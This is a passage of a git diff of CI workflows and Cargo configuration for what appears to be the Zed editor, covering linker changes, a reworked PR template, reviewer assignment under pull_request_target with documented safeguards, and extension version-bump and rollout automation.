diff --git a/.cargo/ci-config.toml b/.cargo/ci-config.toml index b31b79a59b262a5cc18cf1d2b32124a97bab4fc7..6a5feece648a39be39e99fa3eb5807713b911348 100644 --- a/.cargo/ci-config.toml +++ b/.cargo/ci-config.toml @@ -15,14 +15,4 @@ rustflags = ["-D", "warnings"] [profile.dev] debug = "limited" -# Use Mold on Linux, because it's faster than GNU ld and LLD. -# -# We no longer set this in the default `config.toml` so that developers can opt in to Wild, which -# is faster than Mold, in their own ~/.cargo/config.toml. -[target.x86_64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] -[target.aarch64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] diff --git a/.cargo/config.toml b/.cargo/config.toml index 9b2e6f51c96e3ae98a54bbb11524210911d0e262..a9bf1f9cc975cf812605e88379def0ab334f76ad 100644 --- a/.cargo/config.toml +++ b/.cargo/config.toml @@ -16,5 +16,9 @@ rustflags = [ "target-feature=+crt-static", # This fixes the linking issue when compiling livekit on Windows ] +# We need lld to link libwebrtc.a successfully on aarch64-linux +[target.aarch64-unknown-linux-gnu] +rustflags = ["-C", "link-arg=-fuse-ld=lld"] + [env] MACOSX_DEPLOYMENT_TARGET = "10.15.7" diff --git a/.github/DISCUSSION_TEMPLATE/feature-requests.yml b/.github/DISCUSSION_TEMPLATE/feature-requests.yml index 183a3de934eccc8baa8428e822176e31d1d11782..e8a695063c34771ac6120b1e477b7494a17aa3c9 100644 --- a/.github/DISCUSSION_TEMPLATE/feature-requests.yml +++ b/.github/DISCUSSION_TEMPLATE/feature-requests.yml @@ -40,4 +40,4 @@ body: attributes: value: | Learn more about how feature requests work in our - [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/47963). + [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422). 
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 4470b5763fcf84f54ea1b0ef7c2f7bf9786eaaca..b8b7939813f9cc72da88e75653b6f2933403a239 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,10 +1,28 @@ -Closes #ISSUE +## Context -Before you mark this PR as ready for review, make sure that you have: -- [ ] Added a solid test coverage and/or screenshots from doing manual testing -- [ ] Done a self-review taking into account security and performance aspects -- [ ] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) + + +## How to Review + + + +## Self-Review Checklist + + +- [ ] I've reviewed my own diff for quality, security, and reliability +- [ ] Unsafe blocks (if any) have justifying comments +- [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +- [ ] Tests cover the new/changed behavior +- [ ] Performance impact has been considered and is acceptable Release Notes: -- N/A *or* Added/Fixed/Improved ... +- N/A or Added/Fixed/Improved ... diff --git a/.github/workflows/assign-reviewers.yml b/.github/workflows/assign-reviewers.yml index a77f1812d06330b4635fe173583f0f1ce93e4e17..1a21879b639736232f965863a31b9a8d3a2c2b35 100644 --- a/.github/workflows/assign-reviewers.yml +++ b/.github/workflows/assign-reviewers.yml @@ -10,25 +10,43 @@ # AUTH NOTE: Uses a GitHub App (COORDINATOR_APP_ID + COORDINATOR_APP_PRIVATE_KEY) # for all API operations: cloning the private coordinator repo, requesting team # reviewers, and setting PR assignees. GITHUB_TOKEN is not used. +# +# SECURITY INVARIANTS (pull_request_target): +# This workflow runs with access to secrets for ALL PRs including forks. +# It is safe ONLY because: +# 1. The checkout is the coordinator repo at ref: main — NEVER the PR head/branch +# 2. 
No ${{ }} interpolation of event fields in run: blocks — all routed via env: +# 3. The script never executes, sources, or reads files from the PR branch +# Violating any of these enables remote code execution with secret access. name: Assign Reviewers on: - pull_request: + # zizmor: ignore[dangerous-triggers] reviewed — no PR code checkout, only coordinator repo at ref: main + pull_request_target: types: [opened, ready_for_review] # GITHUB_TOKEN is not used — all operations use the GitHub App token. # Declare minimal permissions so the default token has no write access. permissions: {} -# Only run for PRs from within the org (not forks) — fork PRs don't have -# write access to request team reviewers. +# Prevent duplicate runs for the same PR (e.g., rapid push + ready_for_review). +concurrency: + group: assign-reviewers-${{ github.event.pull_request.number }} + cancel-in-progress: true + +# NOTE: For ready_for_review events, the webhook payload may still carry +# draft: true due to a GitHub race condition (payload serialized before DB +# update). We trust the event type instead — the script rechecks draft status +# via a live API call as defense-in-depth. +# +# No author_association filter — external and fork PRs also get reviewer +# assignments. Assigned reviewers are inherently scoped to org team members +# by the GitHub Teams API. jobs: assign-reviewers: if: >- - github.event.pull_request.head.repo.full_name == github.repository && - github.event.pull_request.draft == false && - contains(fromJSON('["MEMBER", "OWNER"]'), github.event.pull_request.author_association) + github.event.action == 'ready_for_review' || github.event.pull_request.draft == false runs-on: ubuntu-latest steps: - name: Generate app token @@ -39,6 +57,8 @@ jobs: private-key: ${{ secrets.COORDINATOR_APP_PRIVATE_KEY }} repositories: codeowner-coordinator,zed + # SECURITY: checks out the coordinator repo at ref: main, NOT the PR branch. 
+ # persist-credentials: false prevents the token from leaking into .git/config. - name: Checkout coordinator repo uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1 with: @@ -54,7 +74,9 @@ jobs: python-version: "3.11" - name: Install dependencies - run: pip install pyyaml==6.0.3 + run: | + pip install --no-deps -q --only-binary ':all:' \ + -r /dev/stdin <<< "pyyaml==6.0.3 --hash=sha256:b8bb0864c5a28024fac8a632c443c87c5aa6f215c0b126c449ae1a150412f31d" - name: Assign reviewers env: @@ -69,7 +91,6 @@ jobs: --rules-file team-membership-rules.yml \ --repo "$TARGET_REPO" \ --org zed-industries \ - --min-association member \ 2>&1 | tee /tmp/assign-reviewers-output.txt - name: Upload output diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 1fa271d168a8c3d1744439647ff50b793a854d1d..1f9e6320700d14cab69662e317c30fa7206eb655 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -37,8 +37,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_pnpm diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index 480d8b0ada98e859d2e72b49a39805ffe8f72b25..62540321ed755f2fd3879a7ddfc3a37237d8e7de 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -23,8 +23,8 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false - token: ${{ steps.get-app-token.outputs.token }} ref: ${{ inputs.branch }} + token: ${{ steps.get-app-token.outputs.token }} - name: bump_patch_version::run_bump_patch_version::bump_patch_version run: | channel="$(cat crates/zed/RELEASE_CHANNEL)" diff --git a/.github/workflows/compare_perf.yml b/.github/workflows/compare_perf.yml index 
f7d78dbbf6a6d04bc47212b6842f894850288fcc..03113f2aa0be4dc794f8f5edec18df22fb0daa31 100644 --- a/.github/workflows/compare_perf.yml +++ b/.github/workflows/compare_perf.yml @@ -30,8 +30,6 @@ jobs: cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: compare_perf::run_perf::install_hyperfine diff --git a/.github/workflows/deploy_collab.yml b/.github/workflows/deploy_collab.yml index 89fb6980b65f2d09a6571f140ab016a710be230f..7fe06460f752599513c79b71bb01636d69d20e6c 100644 --- a/.github/workflows/deploy_collab.yml +++ b/.github/workflows/deploy_collab.yml @@ -12,6 +12,9 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') name: Check formatting and Clippy lints runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 @@ -29,8 +32,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_fmt @@ -42,6 +43,9 @@ jobs: - style name: Run tests runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 @@ -59,8 +63,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git a/.github/workflows/extension_auto_bump.yml b/.github/workflows/extension_auto_bump.yml new file mode 100644 index 0000000000000000000000000000000000000000..9388a0a442bf249505aaf51e9b6826d3bb228fb7 --- 
/dev/null +++ b/.github/workflows/extension_auto_bump.yml @@ -0,0 +1,74 @@ +# Generated from xtask::workflows::extension_auto_bump +# Rebuild with `cargo xtask workflows`. +name: extension_auto_bump +on: + push: + branches: + - main + paths: + - extensions/** + - '!extensions/slash-commands-example/**' + - '!extensions/test-extension/**' + - '!extensions/workflows/**' + - '!extensions/*.md' +jobs: + detect_changed_extensions: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + fetch-depth: 2 + - id: detect + name: extension_auto_bump::detect_changed_extensions + run: | + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + # Filter out newly added or entirely removed extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1 && \ + [ -f "$ext/extension.toml" ]; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. 
+ [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + outputs: + changed_extensions: ${{ steps.detect.outputs.changed_extensions }} + timeout-minutes: 5 + bump_extension_versions: + needs: + - detect_changed_extensions + if: needs.detect_changed_extensions.outputs.changed_extensions != '[]' + permissions: + actions: write + contents: write + issues: write + pull-requests: write + strategy: + matrix: + extension: ${{ fromJson(needs.detect_changed_extensions.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_bump.yml + secrets: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + app-secret: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + with: + working-directory: ${{ matrix.extension }} + force-bump: false +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + cancel-in-progress: true +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/extension_bump.yml b/.github/workflows/extension_bump.yml index 9cc53741e8007a1b3ddd02ad07b191b3ce171cc8..cbe38ee9e5b958eeee80eb5576c93896cc6763e1 100644 --- a/.github/workflows/extension_bump.yml +++ b/.github/workflows/extension_bump.yml @@ -17,6 +17,10 @@ on: description: force-bump required: true type: boolean + working-directory: + description: working-directory + type: string + default: . 
secrets: app-id: description: The app ID used to create the PR @@ -42,8 +46,6 @@ jobs: if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -59,6 +61,10 @@ jobs: version_changed: ${{ steps.compare-versions-check.outputs.version_changed }} current_version: ${{ steps.compare-versions-check.outputs.current_version }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} bump_extension_version: needs: - check_version_changed @@ -77,6 +83,11 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup - name: extension_bump::install_bump_2_version run: pip install bump2version --break-system-packages - id: bump-version @@ -94,29 +105,56 @@ jobs: --no-configured-files "$BUMP_TYPE" "${BUMP_FILES[@]}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." 
|| -z "$WORKING_DIR" ]]; then + { + echo "title=Bump version to ${NEW_VERSION}"; + echo "body=This PR bumps the version of this extension to v${NEW_VERSION}"; + echo "branch_name=zed-zippy-autobump"; + } >> "$GITHUB_OUTPUT" + else + { + echo "title=${EXTENSION_ID}: Bump to v${NEW_VERSION}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${NEW_VERSION}" >> "$GITHUB_OUTPUT" env: OLD_VERSION: ${{ needs.check_version_changed.outputs.current_version }} BUMP_TYPE: ${{ inputs.bump-type }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_pull_request uses: peter-evans/create-pull-request@v7 with: - title: Bump version to ${{ steps.bump-version.outputs.new_version }} - body: This PR bumps the version of this extension to v${{ steps.bump-version.outputs.new_version }} - commit-message: Bump version to v${{ steps.bump-version.outputs.new_version }} - branch: zed-zippy-autobump + title: ${{ steps.bump-version.outputs.title }} + body: ${{ steps.bump-version.outputs.body }} + commit-message: ${{ steps.bump-version.outputs.title }} + branch: ${{ steps.bump-version.outputs.branch_name }} committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> base: main delete-branch: true token: ${{ steps.generate-token.outputs.token }} sign-commits: true assignees: ${{ github.actor }} - timeout-minutes: 3 + timeout-minutes: 5 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} create_version_label: needs: - check_version_changed @@ -133,6 +171,21 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false + - id: determine-tag + name: extension_bump::determine_tag + run: | + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." 
|| -z "$WORKING_DIR" ]]; then + TAG="v${CURRENT_VERSION}" + else + TAG="${EXTENSION_ID}-v${CURRENT_VERSION}" + fi + + echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + env: + CURRENT_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_version_tag uses: actions/github-script@v7 with: @@ -140,11 +193,17 @@ jobs: github.rest.git.createRef({ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v${{ needs.check_version_changed.outputs.current_version }}', + ref: 'refs/tags/${{ steps.determine-tag.outputs.tag }}', sha: context.sha }) github-token: ${{ steps.generate-token.outputs.token }} + outputs: + tag: ${{ steps.determine-tag.outputs.tag }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} trigger_release: needs: - check_version_changed @@ -170,16 +229,85 @@ jobs: EXTENSION_ID="$(sed -n 's/id = \"\(.*\)\"/\1/p' < extension.toml)" echo "extension_id=${EXTENSION_ID}" >> "$GITHUB_OUTPUT" - - name: extension_bump::release_action - uses: huacnlee/zed-extension-action@v2 + - id: extension-update + name: extension_bump::release_action + uses: huacnlee/zed-extension-action@82920ff0876879f65ffbcfa3403589114a8919c6 with: extension-name: ${{ steps.get-extension-id.outputs.extension_id }} push-to: zed-industries/extensions - tag: v${{ needs.check_version_changed.outputs.current_version }} + tag: ${{ needs.create_version_label.outputs.tag }} env: COMMITTER_TOKEN: ${{ steps.generate-token.outputs.token }} + - name: extension_bump::enable_automerge_if_staff + uses: actions/github-script@v7 + with: + github-token: ${{ steps.generate-token.outputs.token }} + script: | + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await 
github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) { + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + env: + PR_NUMBER: ${{ steps.extension-update.outputs.pull-request-number }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-bump cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_tests.yml b/.github/workflows/extension_tests.yml index 53de373c1b79dc3ca9a3637642e10998c781580a..89668c028a6d1fa4baddd417687226dd55a52426 100644 --- a/.github/workflows/extension_tests.yml +++ b/.github/workflows/extension_tests.yml @@ -9,7 +9,12 @@ env: RUSTUP_TOOLCHAIN: stable 
CARGO_BUILD_TARGET: wasm32-wasip2 on: - workflow_call: {} + workflow_call: + inputs: + working-directory: + description: working-directory + type: string + default: . jobs: orchestrate: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') @@ -34,6 +39,14 @@ jobs: fi CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi + check_pattern() { local output_name="$1" local pattern="$2" @@ -49,6 +62,10 @@ jobs: outputs: check_rust: ${{ steps.filter.outputs.check_rust }} check_extension: ${{ steps.filter.outputs.check_extension }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_rust: needs: - orchestrate @@ -66,17 +83,31 @@ jobs: path: ~/.rustup - name: extension_tests::install_rust_target run: rustup target add wasm32-wasip2 - - name: steps::cargo_fmt - run: cargo fmt --all -- --check + - id: get-package-name + name: extension_tests::get_package_name + run: | + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + - name: extension_tests::cargo_fmt_package + run: cargo fmt -p "$PACKAGE_NAME" -- --check + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: extension_tests::run_clippy - run: cargo clippy --release --all-features -- --deny warnings + run: cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: steps::cargo_install_nextest uses: 
taiki-e/install-action@nextest - - name: steps::cargo_nextest - run: 'cargo nextest run --workspace --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' + - name: extension_tests::run_nextest + run: 'cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} NEXTEST_NO_TESTS: warn timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_extension: needs: - orchestrate @@ -97,8 +128,8 @@ jobs: - name: extension_tests::download_zed_extension_cli if: steps.cache-zed-extension-cli.outputs.cache-hit != 'true' run: | - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" - name: steps::cache_rust_dependencies_namespace uses: namespacelabs/nscloud-cache-action@v1 with: @@ -108,7 +139,7 @@ jobs: run: | mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output - name: run_tests::fetch_ts_query_ls uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c with: @@ -117,8 +148,8 @@ jobs: file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - name: run_tests::run_ts_query_ls run: |- - tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - ./ts_query_ls format --check . || { + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . 
|| { echo "Found unformatted queries, please format them with ts_query_ls." echo "For easy use, install the Tree-sitter query extension:" echo "zed://extension/tree-sitter-query" @@ -132,8 +163,6 @@ jobs: if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -156,6 +185,10 @@ jobs: VERSION_CHANGED: ${{ steps.compare-versions-check.outputs.version_changed }} PR_USER_LOGIN: ${{ github.event.pull_request.user.login }} timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} tests_pass: needs: - orchestrate @@ -184,7 +217,7 @@ jobs: RESULT_CHECK_RUST: ${{ needs.check_rust.result }} RESULT_CHECK_EXTENSION: ${{ needs.check_extension.result }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-tests cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_workflow_rollout.yml b/.github/workflows/extension_workflow_rollout.yml index 9bfac06d4527985553ba3d04e64c656ee5bf85e4..f695b43ecac47a221bbc795d03e6ddd6259d7014 100644 --- a/.github/workflows/extension_workflow_rollout.yml +++ b/.github/workflows/extension_workflow_rollout.yml @@ -4,12 +4,57 @@ name: extension_workflow_rollout env: CARGO_TERM_COLOR: always on: - workflow_dispatch: {} + workflow_dispatch: + inputs: + filter-repos: + description: Comma-separated list of repository names to rollout to. Leave empty for all repos. 
+ type: string + default: '' + change-description: + description: Description for the changes to be expected with this rollout + type: string + default: '' jobs: fetch_extension_repos: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && github.ref == 'refs/heads/main' runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - name: checkout_zed_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + fetch-depth: 0 + - id: prev-tag + name: extension_workflow_rollout::fetch_extension_repos::get_previous_tag_commit + run: | + PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") + if [ -z "$PREV_COMMIT" ]; then + echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." + exit 1 + fi + echo "Found previous rollout at commit: $PREV_COMMIT" + echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" + - id: calc-changes + name: extension_workflow_rollout::fetch_extension_repos::get_removed_files + run: | + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + env: + PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - id: list-repos name: extension_workflow_rollout::fetch_extension_repos::get_repositories uses: actions/github-script@v7 @@ -21,16 +66,42 @@ jobs: per_page: 100, }); - const filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); + const filterInput = `${{ inputs.filter-repos }}`.trim(); 
+ if (filterInput.length > 0) { + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${filteredRepos.length} repos from ${allowedNames.length} requested.`); + } + console.log(`Found ${filteredRepos.length} extension repos`); return filteredRepos; result-encoding: json + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup + - name: extension_workflow_rollout::fetch_extension_repos::generate_workflow_files + run: | + cargo xtask workflows "$COMMIT_SHA" + env: + COMMIT_SHA: ${{ github.sha }} + - name: extension_workflow_rollout::fetch_extension_repos::upload_workflow_files + uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 + with: + name: extension-workflow-files + path: extensions/workflows/**/*.yml + if-no-files-found: error outputs: repos: ${{ steps.list-repos.outputs.result }} - timeout-minutes: 5 + prev_commit: ${{ steps.prev-tag.outputs.prev_commit }} + removed_ci: ${{ steps.calc-changes.outputs.removed_ci }} + removed_shared: ${{ steps.calc-changes.outputs.removed_shared }} + timeout-minutes: 10 rollout_workflows_to_extension: needs: - fetch_extension_repos @@ -53,59 +124,28 @@ jobs: permission-pull-requests: write permission-contents: write permission-workflows: write - - name: checkout_zed_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - fetch-depth: 0 - path: zed - name: checkout_extension_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false - token: ${{ steps.generate-token.outputs.token }} path: extension repository: zed-extensions/${{ matrix.repo }} - - id: prev-tag - name: extension_workflow_rollout::rollout_workflows_to_extension::get_previous_tag_commit - run: | - PREV_COMMIT=$(git rev-parse 
"extension-workflows^{commit}" 2>/dev/null || echo "") - if [ -z "$PREV_COMMIT" ]; then - echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." - exit 1 - fi - echo "Found previous rollout at commit: $PREV_COMMIT" - echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" - working-directory: zed - - id: calc-changes - name: extension_workflow_rollout::rollout_workflows_to_extension::get_removed_files + token: ${{ steps.generate-token.outputs.token }} + - name: extension_workflow_rollout::rollout_workflows_to_extension::download_workflow_files + uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 + with: + name: extension-workflow-files + path: workflow-files + - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files run: | + mkdir -p extension/.github/workflows + if [ "$MATRIX_REPO" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" + REMOVED_FILES="$REMOVED_CI" else - WORKFLOW_DIR="extensions/workflows/shared" + REMOVED_FILES="$REMOVED_SHARED" fi - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" - - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then extracting files that are gone from their original location - REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" 